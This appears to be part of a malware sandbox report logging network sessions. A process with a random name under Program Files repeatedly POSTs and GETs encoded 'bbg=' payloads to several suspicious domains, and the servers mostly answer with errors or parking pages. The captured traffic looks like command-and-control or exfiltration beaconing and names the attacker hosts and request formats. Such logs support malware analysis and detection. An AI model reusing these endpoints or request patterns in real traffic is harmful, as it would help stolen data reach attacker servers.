                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Data Ascii: bbg= [TRUNCATED]
Jan 10, 2025 19:53:06.288997889 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:06 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 50013 | 156.251.17.224 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:53:07.965236902 CET | 524 | OUT | GET /u11p/?bbg=kZhtX7A2sH2Eo6iMIWGZUso0i5sc+RpFVMT48ed6Ly4yhf18n7pPOVMHRPIihFA/8qVQHA8l2MRLeM0A4ZXpHK5zp1AfcmEdh8Me18rVPXN1xmrP+jJ5uM9Xypqrvyuogg==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.duwixushx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Jan 10, 2025 19:53:08.866660118 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 50015 | 194.245.148.189 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:53:13.935770035 CET | 795 | OUT | POST /ib68/ HTTP/1.1
                                                                                      Host: www.maitreyatoys.world
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.maitreyatoys.world
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.maitreyatoys.world/ib68/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=nD0R9KJsrXj5L9H5EUE4tMbTfXyE1z2PfbeRuErC8ZDJ5sKjK08OgtEirN+7tOY0Bo7hlWaN70WnvZwGM1ekf1/4YPb0xoNen+jT9JfXVFnzbCS4w+UKvwtiV/T277JOM6h4qDdlYx48GZZabHwrKsMCj19gp5aBxNj5S5y4lre7CYj3LDTmVUMECO9wyyP7fRf/f/8=
Jan 10, 2025 19:53:14.544361115 CET | 725 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:14 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50017 | 194.245.148.189 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:53:16.487102985 CET | 815 | OUT | POST /ib68/ HTTP/1.1
                                                                                      Host: www.maitreyatoys.world
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.maitreyatoys.world
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.maitreyatoys.world/ib68/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=nD0R9KJsrXj5KcX5C3c4osbSR3yE/T2LfbSRuGHS8rnJ6IOjEQIOhtEikt/QpOYBBo+ClUON71ynvYAGMkelel/6Qvb2vYNen+jT9JjxVFfzbyi4wfUJwAthFPT2qLJKM6gdqG9DYzw8GZpabWwsDsME7V8/5aH0/87QRanEkYzFDuSdRhbOG0g8Sd1HjCuSFyPPBoocI2QCSgZq6SYiUAGKyG88
Jan 10, 2025 19:53:17.093926907 CET | 725 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:17 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 50018 | 194.245.148.189 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:53:19.032689095 CET | 1832 | OUT | POST /ib68/ HTTP/1.1
                                                                                      Host: www.maitreyatoys.world
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.maitreyatoys.world
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.maitreyatoys.world/ib68/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Data Ascii: bbg= [TRUNCATED]
                                                                                      Jan 10, 2025 19:53:19.753648996 CET | 725 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:19 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      21 | 192.168.2.5 | 50019 | 194.245.148.189 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:21.575167894 CET | 529 | OUT | GET /ib68/?bbg=qBcx+6F+oW3FLMWCFGkku82ue0n+3hqnVOqcrGj635TZ+b/5EUsj5Zs7kPmyn50XK/Tp7ki26yO6xrdZPEzCUCLwZvbCuKVw+bGKkpnxeC2/cgva9NQSwRBKH/jO8oEkZw==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.maitreyatoys.world
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:53:22.225976944 CET | 242 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:22 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Content-Length: 1840
                                                                                      Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                                                      Connection: close
                                                                                      ETag: "58e3a61e-730"
                                                                                      Accept-Ranges: bytes
                                                                                      Jan 10, 2025 19:53:22.226716995 CET | 1236 | IN
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta
                                                                                      Jan 10, 2025 19:53:22.226730108 CET | 604 | IN
                                                                                      Data Ascii: zation.</p> <p><a class="btn btn-lg btn-success" href="https://joker.com/?pk_campaign=Parking&pk_kwd=text" role="button">JOKER.COM</a></p> </div> <footer class="footer"> <p>&copy; 2017 CSL GmbH / JOKER.COM</p>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      22 | 192.168.2.5 | 50020 | 38.181.21.178 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:27.631556034 CET | 768 | OUT | POST /tw1g/ HTTP/1.1
                                                                                      Host: www.44ynh.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.44ynh.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.44ynh.top/tw1g/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=SVf0NGrLg3LYfiWYj9PWi65TieesgwMveh4EGHiN+SxjKMJyAPiOx47rQ6tP4Mae7+khzi2rttqtHQzLJiaKCWLMo2XyxSRpl25nS+E2kUDFiZvogGjeG5pN47LnaLzZ95rRw0uNTl0SXLRlr70IF65IZYijgre22W1V36XZJxMfJEWA2jWDaqL/0h4/fAQ6jmJcF0g=
                                                                                      Jan 10, 2025 19:53:28.544368982 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:28 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66df0ead-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      23 | 192.168.2.5 | 50021 | 38.181.21.178 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:30.191828966 CET | 788 | OUT | POST /tw1g/ HTTP/1.1
                                                                                      Host: www.44ynh.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.44ynh.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.44ynh.top/tw1g/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=SVf0NGrLg3LYeCmYie3Wga5Qs+es1gMreh8EGGnK+AVjLpNyBOiO247rEqtKlcbQ7+opzjKrtp6tHQjLJQyJTWLK9mXw1SRpl25nS+BhkQvFjofogjXdF5pKxbLneLzV95r/wxOrTgoSXOtlrOAHK65OX4j1prvC7GJs9YOKQQQYIynqsBerJKnHkywIOwxT5FZsbj12/i2BibfWRUphUt7BSguu
                                                                                      Jan 10, 2025 19:53:31.085824013 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66df0ead-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      24 | 192.168.2.5 | 50022 | 38.181.21.178 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:32.743423939 CET | 1805 | OUT | POST /tw1g/ HTTP/1.1
                                                                                      Host: www.44ynh.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.44ynh.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.44ynh.top/tw1g/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:53:33.664808035 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:33 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66df0ead-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      25 | 192.168.2.5 | 50023 | 38.181.21.178 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:35.292706013 CET | 520 | OUT | GET /tw1g/?bbg=fX3UOxnLllreThWFlcCTjb1Gj8v81Qg4BBMMPlWtmipxCrV4LuGb/+qUB8ds6Milzu4Vsg6gjoKyWT3+exaSJF/XiV2wljFcpTs2dr1B9jzRtZTommTdOKRk2oHkAr6Pug==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.44ynh.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:53:36.178807020 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:36 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66df0ead-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      26 | 192.168.2.5 | 50024 | 185.104.45.157 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:41.274173975 CET | 804 | OUT | POST /iwr0/ HTTP/1.1
                                                                                      Host: www.montero-beauty.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.montero-beauty.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.montero-beauty.online/iwr0/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=T7USn0XhyoL2PolKE29km8kCtP5bdId894BXDE4VUj/f2ESGZ/AR6cQQ8JstlOJP8pTqRGr3GWo8H6PPEfXRs7yP1Cpcf0MAghOuPZeVZTfe6BPMlNIRXvs4ubMaQK9v+Mv5wee5PC6d/EGwseV7DqEm0S871VjQj5RVQN/6DrN6QxbYI8QOIY+HcaNvJ2SuAhXA51U=
                                                                                      Jan 10, 2025 19:53:41.983722925 CET | 737 | IN | HTTP/1.1 405 Not Allowed
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:41 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-ray: p13015:0.000
                                                                                      Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      27 | 192.168.2.5 | 50025 | 185.104.45.157 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:43.828263044 CET | 824 | OUT | POST /iwr0/ HTTP/1.1
                                                                                      Host: www.montero-beauty.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.montero-beauty.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.montero-beauty.online/iwr0/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=T7USn0XhyoL2PN1KGWBkkckBxf5bWod494NXDAgFUwbf3kCGY9oR5cQQ3pso4eIB8peARE/3GW88H/LPEoDWtryNsSpeCkMAghOuPZa/ZTHe6xfMlvwQLfs54LMaUK9r+MuewaWTPBCd/GuwsPV4JqEksy9ownC9mYp4RezyddNzcnqySeYmb4S/MJFYYGzHaCHwniBt+Sp6XFBVp79rtSXUz3JA
                                                                                      Jan 10, 2025 19:53:44.516108990 CET | 737 | IN | HTTP/1.1 405 Not Allowed
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:44 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-ray: p13015:0.000
                                                                                      Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      28 | 192.168.2.5 | 50026 | 185.104.45.157 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:46.375705004 CET | 1841 | OUT | POST /iwr0/ HTTP/1.1
                                                                                      Host: www.montero-beauty.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.montero-beauty.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.montero-beauty.online/iwr0/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg= [TRUNCATED]
                                                                                      Jan 10, 2025 19:53:47.075572968 CET | 737 | IN | HTTP/1.1 405 Not Allowed
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:46 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-ray: p13015:0.000
                                                                                      Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      29 | 192.168.2.5 | 50027 | 185.104.45.157 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:49.840758085 CET | 532 | OUT | GET /iwr0/?bbg=e58ykDXR7JLcMoNRWEYHn8cc5Pgwf9t/kt1uMD4eNiXxy32DdM8h+aEO1Z89nPF0w4/1A2XEUA4gZargWKfwgcGRrE4dAF8MmhPgLvSHdRT95UfShtNaVZFD9IYeOb8YiA==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.montero-beauty.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:53:50.554249048 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:50 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-ray: p13015:0.000
                                                                                      Data Ascii: 14ad<!doctype html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><TITLE>Website www.montero-beauty.online not configured</TITLE><style type="text/css"> * { box-sizing: border-box; margin: 0; padding: 0; font-family: 'Open Sans', sans-serif; } body { background-color: #f1f4f5;; } .content { margin-top: 30vh; width: 100%; height: 100vh; display: flex; align-items: center; flex-direction: column; gap: 1.5em; color: #3b3a3a } .content a { color: [TRUNCATED]
                                                                                      Jan 10, 2025 19:53:50.554301023 CET | 224 | IN
                                                                                      Data Ascii: width: 50%; } @media screen and (max-width: 750px) { .content > * { width: 85%; } }</style></head><body><div class="content"><div class="header"><
                                                                                      Jan 10, 2025 19:53:50.554337978 CET | 1236 | IN
                                                                                      Data Ascii: h2>Website www.montero-beauty.online not configure</h2></div><div class="comment">Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15
                                                                                      Jan 10, 2025 19:53:50.554373980 CET | 1236 | IN
                                                                                      Data Ascii: },'de': {'title': 'Website www.montero-beauty.online nicht konfiguriert','h2': 'Website www.montero-beauty.online nicht konfiguriert','.comment': 'Domainadressendatensatz verweist auf unseren Server, aber diese Site wird nicht
                                                                                      Jan 10, 2025 19:53:50.554409027 CET | 1236 | IN
                                                                                      Data Ascii: r> - 15 ','.link': '',},'ru': {'title': ' www.montero-beauty.online ',
                                                                                      Jan 10, 2025 19:53:50.554449081 CET | 309 | IN
                                                                                      Data Ascii: }if(['ru', 'uk'].includes(lang)) {document.querySelector('.link').href = `https://www.ukraine.com.ua/${lang}/wiki/hosting/errors/site-not-served/`} else {document.querySelector('.link').href = `https://hosting.xyz/wiki/hosting/e


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
